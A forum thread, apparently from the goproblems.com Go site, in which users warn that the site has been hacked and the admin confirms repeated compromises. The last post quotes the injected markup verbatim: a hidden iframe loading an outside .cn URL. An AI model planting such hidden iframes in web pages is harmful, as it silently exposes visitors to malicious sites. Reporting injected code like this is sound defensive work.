WARNNING! GP hijacked?! =O

santa c II

WARNNING! GP hijacked?! =O

Post by santa c II »

hi guys, you might consider waiting until adum fixes whatever's going one - goproblems was either hacked or hijacked.
yesterday there was, in addition to some odd links, a hidden iframe loading up a harmful site (dxline.cn), might consider scanning the comp... (atm it seems to be gone, but some funky links remain)

(and switching to a more secure alternative like ff+noscript / opera (or maybe chorme? i'm not up to date) and updating your fw/av/ spybot /whatever...)

whatever happens, might be a good idea to to not login until adum fixes it...
(kgs has a msg in the egr as well as the heb room, btw, saying just that)

(this is especially aimed at the ppl who used the site today and yesterday...)
adum
Site Admin

Re: WARNNING! GP hijacked?! =O

Post by adum »

hey, thanks for posting this. i'm aware of the problem. unfortunately, i'm not sure how it's getting hacked (repeatedly.) i have tried to protect it. hopefully that will work, and i'm trying to stay on top of it. sorry for troubles.
santa c

Re: WARNNING! GP hijacked?! =O

Post by santa c »

ah, sorry to hear that, hope it's better now... ^^*

adum, could you please also remove <iframe src=" http://wuorz.cn/kz4i1/fi24/" style="visibility: hidden; display: none"></iframe> from the source of the home page? i know it's a commented out atm but besides wasting bw, my av also keeps alerting me and auto-blocking the site... might be a bit uncomfortable for some users and might scare new people away...